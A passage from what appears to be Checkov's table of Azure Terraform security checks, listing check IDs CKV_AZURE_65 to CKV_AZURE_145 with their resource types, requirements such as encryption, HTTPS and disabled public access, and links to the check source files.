[AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | +| 1291 | CKV_AZURE_65 | resource | azurerm_linux_web_app | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | +| 1292 | CKV_AZURE_65 | resource | azurerm_windows_web_app | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | +| 1293 | CKV_AZURE_66 | resource | azurerm_app_service | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | +| 1294 | CKV_AZURE_66 | resource | azurerm_linux_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | +| 1295 | CKV_AZURE_66 | resource | azurerm_windows_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | +| 1296 | CKV_AZURE_67 | resource | azurerm_function_app | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) | +| 1297 | CKV_AZURE_67 | resource | azurerm_function_app_slot | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) | +| 1298 | CKV_AZURE_68 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server disables public network access | Terraform | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerPublicAccessDisabled.py) | +| 1299 | CKV_AZURE_69 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Azure SQL database servers | Terraform | [AzureDefenderOnSqlServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServers.py) | +| 1300 | CKV_AZURE_70 | resource | azurerm_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1301 | CKV_AZURE_70 | resource | azurerm_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1302 | CKV_AZURE_70 | resource | azurerm_linux_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1303 | CKV_AZURE_70 | resource | azurerm_linux_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1304 | CKV_AZURE_70 | resource | azurerm_windows_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1305 | CKV_AZURE_70 | resource | azurerm_windows_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1306 | CKV_AZURE_71 | resource | azurerm_app_service | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | +| 1307 | CKV_AZURE_71 | resource | azurerm_linux_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | +| 1308 | CKV_AZURE_71 | resource | azurerm_windows_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | +| 1309 | CKV_AZURE_72 | resource | azurerm_app_service | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | +| 1310 | CKV_AZURE_72 | resource | azurerm_linux_web_app | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | +| 1311 | CKV_AZURE_72 | resource | azurerm_windows_web_app | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | +| 1312 | CKV_AZURE_73 | resource | azurerm_automation_variable_bool | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1313 | CKV_AZURE_73 | resource | azurerm_automation_variable_datetime | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1314 | CKV_AZURE_73 | resource | azurerm_automation_variable_int | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1315 | CKV_AZURE_73 | resource | azurerm_automation_variable_string | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1316 | CKV_AZURE_74 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer (Kusto) uses disk encryption | Terraform | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerUsesDiskEncryption.py) | +| 1317 | CKV_AZURE_75 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer uses double encryption | Terraform | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDataExplorerDoubleEncryptionEnabled.py) | +| 1318 | CKV_AZURE_76 | resource | azurerm_batch_account | Ensure that Azure Batch account uses key vault to encrypt data | Terraform | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureBatchAccountUsesKeyVaultEncryption.py) | +| 1319 | CKV_AZURE_77 | resource | azurerm_network_security_group | Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) | +| 1320 | CKV_AZURE_77 | resource | azurerm_network_security_rule | Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) | +| 1321 | CKV_AZURE_78 | resource | azurerm_app_service | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | +| 1322 | CKV_AZURE_78 | resource | azurerm_linux_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | +| 1323 | CKV_AZURE_78 | resource | azurerm_windows_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | +| 1324 | CKV_AZURE_79 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for SQL servers on machines | Terraform | [AzureDefenderOnSqlServerVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServerVMS.py) | +| 1325 | CKV_AZURE_80 | resource | azurerm_app_service | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) | +| 1326 | CKV_AZURE_80 | resource | azurerm_windows_web_app | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) | +| 1327 | CKV_AZURE_81 | resource | azurerm_app_service | Ensure that 'PHP version' is the latest, if used to run the web app | Terraform | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePHPVersion.py) | +| 1328 | CKV_AZURE_82 | resource | azurerm_app_service | Ensure that 'Python version' is the latest, if used to run the web app | Terraform | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePythonVersion.py) | +| 1329 | CKV_AZURE_83 | resource | azurerm_app_service | Ensure that 'Java version' is the latest, if used to run the web app | Terraform | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceJavaVersion.py) | +| 1330 | CKV_AZURE_84 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Storage | Terraform | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnStorage.py) | +| 1331 | CKV_AZURE_85 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Kubernetes | Terraform | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKubernetes.py) | +| 1332 | CKV_AZURE_86 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Container Registries | Terraform | [AzureDefenderOnContainerRegistry.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnContainerRegistry.py) | +| 1333 | CKV_AZURE_87 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Key Vault | Terraform | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKeyVaults.py) | +| 1334 | CKV_AZURE_88 | resource | azurerm_app_service | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | +| 1335 | CKV_AZURE_88 | resource | azurerm_linux_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | +| 1336 | CKV_AZURE_88 | resource | azurerm_windows_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | +| 1337 | CKV_AZURE_89 | resource | azurerm_redis_cache | Ensure that Azure Cache for Redis disables public network access | Terraform | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCachePublicNetworkAccessEnabled.py) | +| 1338 | CKV_AZURE_91 | resource | azurerm_redis_cache | Ensure that only SSL are enabled for Cache for Redis | Terraform | [RedisCacheEnableNonSSLPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheEnableNonSSLPort.py) | +| 1339 | CKV_AZURE_92 | resource | azurerm_linux_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) | +| 1340 | CKV_AZURE_92 | resource | azurerm_windows_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) | +| 1341 | CKV_AZURE_93 | resource | azurerm_managed_disk | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Terraform | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryptionSet.py) | +| 1342 | CKV_AZURE_94 | resource | azurerm_mysql_flexible_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) | +| 1343 | CKV_AZURE_94 | resource | azurerm_mysql_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) | +| 1344 | CKV_AZURE_95 | resource | azurerm_virtual_machine_scale_set | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Terraform | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMScaleSetsAutoOSImagePatchingEnabled.py) | +| 1345 | CKV_AZURE_96 | resource | azurerm_mysql_server | Ensure that MySQL server enables infrastructure encryption | Terraform | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLEncryptionEnabled.py) | +| 1346 | CKV_AZURE_97 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) | +| 1347 | CKV_AZURE_97 | resource | azurerm_windows_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) | +| 1348 | CKV_AZURE_98 | resource | azurerm_container_group | Ensure that Azure Container group is deployed into virtual network | Terraform | [AzureContainerGroupDeployedIntoVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerGroupDeployedIntoVirtualNetwork.py) | +| 1349 | CKV_AZURE_99 | resource | azurerm_cosmosdb_account | Ensure Cosmos DB accounts have restricted access | Terraform | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBAccountsRestrictedAccess.py) | +| 1350 | CKV_AZURE_100 | resource | azurerm_cosmosdb_account | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Terraform | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBHaveCMK.py) | +| 1351 | CKV_AZURE_101 | resource | azurerm_cosmosdb_account | Ensure that Azure Cosmos DB disables public network access | Terraform | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisablesPublicNetwork.py) | +| 1352 | CKV_AZURE_102 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables geo-redundant backups | Terraform | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgressSQLGeoBackupEnabled.py) | +| 1353 | CKV_AZURE_103 | resource | azurerm_data_factory | Ensure that Azure Data Factory uses Git repository for source control | Terraform | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryUsesGitRepository.py) | +| 1354 | CKV_AZURE_104 | resource | azurerm_data_factory | Ensure that Azure Data factory public network access is disabled | Terraform | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryNoPublicNetworkAccess.py) | +| 1355 | CKV_AZURE_105 | resource | azurerm_data_lake_store | Ensure that Data Lake Store accounts enables encryption | Terraform | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataLakeStoreEncryption.py) | +| 1356 | CKV_AZURE_106 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain public network access is disabled | Terraform | [EventgridDomainNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainNetworkAccess.py) | +| 1357 | CKV_AZURE_107 | resource | azurerm_api_management | Ensure that API management services use virtual networks | Terraform | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIServicesUseVirtualNetwork.py) | +| 1358 | CKV_AZURE_108 | resource | azurerm_iothub | Ensure that Azure IoT Hub disables public network access | Terraform | [IoTNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/IoTNoPublicNetworkAccess.py) | +| 1359 | CKV_AZURE_109 | resource | azurerm_key_vault | Ensure that key vault allows firewall rules settings | Terraform | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesFirewallRulesSettings.py) | +| 1360 | CKV_AZURE_110 | resource | azurerm_key_vault | Ensure that key vault enables purge protection | Terraform | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesPurgeProtection.py) | +| 1361 | CKV_AZURE_111 | resource | azurerm_key_vault | Ensure that key vault enables soft delete | Terraform | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesSoftDelete.py) | +| 1362 | CKV_AZURE_112 | resource | azurerm_key_vault_key | Ensure that key vault key is backed by HSM | Terraform | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyBackedByHSM.py) | +| 1363 | CKV_AZURE_113 | resource | azurerm_mssql_server | Ensure that SQL server disables public network access | Terraform | [SQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerPublicAccessDisabled.py) | +| 1364 | CKV_AZURE_114 | resource | azurerm_key_vault_secret | Ensure that key vault secrets have "content_type" set | Terraform | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretContentType.py) | +| 1365 | CKV_AZURE_115 | resource | azurerm_kubernetes_cluster | Ensure that AKS enables private clusters | Terraform | [AKSEnablesPrivateClusters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEnablesPrivateClusters.py) | +| 1366 | CKV_AZURE_116 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses Azure Policies Add-on | Terraform | [AKSUsesAzurePoliciesAddon.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesAzurePoliciesAddon.py) | +| 1367 | CKV_AZURE_117 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses disk encryption set | Terraform | [AKSUsesDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesDiskEncryptionSet.py) | +| 1368 | CKV_AZURE_118 | resource | azurerm_network_interface | Ensure that Network Interfaces disable IP forwarding | Terraform | [NetworkInterfaceEnableIPForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkInterfaceEnableIPForwarding.py) | +| 1369 | CKV_AZURE_119 | resource | azurerm_network_interface | Ensure that Network Interfaces don't use public IPs | Terraform | [AzureNetworkInterfacePublicIPAddressId.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureNetworkInterfacePublicIPAddressId.yaml) | +| 1370 | CKV_AZURE_120 | resource | azurerm_application_gateway | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) | +| 1371 | CKV_AZURE_120 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) | +| 1372 | CKV_AZURE_121 | resource | azurerm_frontdoor | Ensure that Azure Front Door enables WAF | Terraform | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFrontDoorEnablesWAF.py) | +| 1373 | CKV_AZURE_122 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway uses WAF in "Detection" or "Prevention" modes | Terraform | [AppGWUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUseWAFMode.py) | +| 1374 | CKV_AZURE_123 | resource | azurerm_frontdoor_firewall_policy | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Terraform | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontdoorUseWAFMode.py) | +| 1375 | CKV_AZURE_124 | resource | azurerm_search_service | Ensure that Azure Cognitive Search disables public network access | Terraform | [AzureSearchPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchPublicNetworkAccessDisabled.py) | +| 1376 | CKV_AZURE_125 | resource | azurerm_service_fabric_cluster | Ensures that Service Fabric use three levels of protection available | Terraform | [AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServiceFabricClusterProtectionLevel.py) | +| 1377 | CKV_AZURE_126 | resource | azurerm_service_fabric_cluster | Ensures that Active Directory is used for authentication for Service Fabric | Terraform | [ActiveDirectoryUsedAuthenticationServiceFabric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ActiveDirectoryUsedAuthenticationServiceFabric.py) | +| 1378 | CKV_AZURE_127 | resource | azurerm_mysql_server | Ensure that My SQL server enables Threat detection policy | Terraform | [MySQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLTreatDetectionEnabled.py) | +| 1379 | CKV_AZURE_128 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables Threat detection policy | Terraform | [PostgresSQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgresSQLTreatDetectionEnabled.py) | +| 1380 | CKV_AZURE_129 | resource | azurerm_mariadb_server | Ensure that MariaDB server enables geo-redundant backups | Terraform | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBGeoBackupEnabled.py) | +| 1381 | CKV_AZURE_130 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables infrastructure encryption | Terraform | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLEncryptionEnabled.py) | +| 1382 | CKV_AZURE_131 | resource | azurerm_security_center_contact | Ensure that 'Security contact emails' is set | Terraform | [SecurityCenterContactEmails.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmails.py) | +| 1383 | CKV_AZURE_132 | resource | azurerm_cosmosdb_account | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Terraform | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisableAccessKeyWrite.py) | +| 1384 | CKV_AZURE_133 | resource | azurerm_frontdoor_firewall_policy | Ensure Front Door WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontDoorWAFACLCVE202144228.py) | +| 1385 | CKV_AZURE_134 | resource | azurerm_cognitive_account | Ensure that Cognitive Services accounts disable public network access | Terraform | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesDisablesPublicNetwork.py) | +| 1386 | CKV_AZURE_135 | resource | azurerm_web_application_firewall_policy | Ensure Application Gateway WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGatewayWAFACLCVE202144228.py) | +| 1387 | CKV_AZURE_136 | resource | azurerm_postgresql_flexible_server | Ensure that PostgreSQL Flexible server enables geo-redundant backups | Terraform | [PostgreSQLFlexiServerGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLFlexiServerGeoBackupEnabled.py) | +| 1388 | CKV_AZURE_137 | resource | azurerm_container_registry | Ensure ACR admin account is disabled | Terraform | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAdminAccountDisabled.py) | +| 1389 | CKV_AZURE_138 | resource | azurerm_container_registry | Ensures that ACR disables anonymous pulling of images | Terraform | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAnonymousPullDisabled.py) | +| 1390 | CKV_AZURE_139 | resource | azurerm_container_registry | Ensure ACR set to disable public networking | Terraform | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRPublicNetworkAccessDisabled.py) | +| 1391 | CKV_AZURE_140 | resource | azurerm_cosmosdb_account | Ensure that Local Authentication is disabled on CosmosDB | Terraform | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBLocalAuthDisabled.py) | +| 1392 | CKV_AZURE_141 | resource | azurerm_kubernetes_cluster | Ensure AKS local admin account is disabled | Terraform | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLocalAdminDisabled.py) | +| 1393 | CKV_AZURE_142 | resource | azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Local Authentication is disabled | Terraform | [MLCCLADisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLCCLADisabled.py) | +| 1394 | CKV_AZURE_143 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster nodes do not have public IP addresses | Terraform | [AKSNodePublicIpDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNodePublicIpDisabled.py) | +| 1395 | CKV_AZURE_144 | resource | azurerm_machine_learning_workspace | Ensure that Public Access is disabled for Machine Learning Workspace | Terraform | [MLPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLPublicAccess.py) | +| 1396 | CKV_AZURE_145 | resource | azurerm_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1397 | CKV_AZURE_145 | resource | azurerm_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | 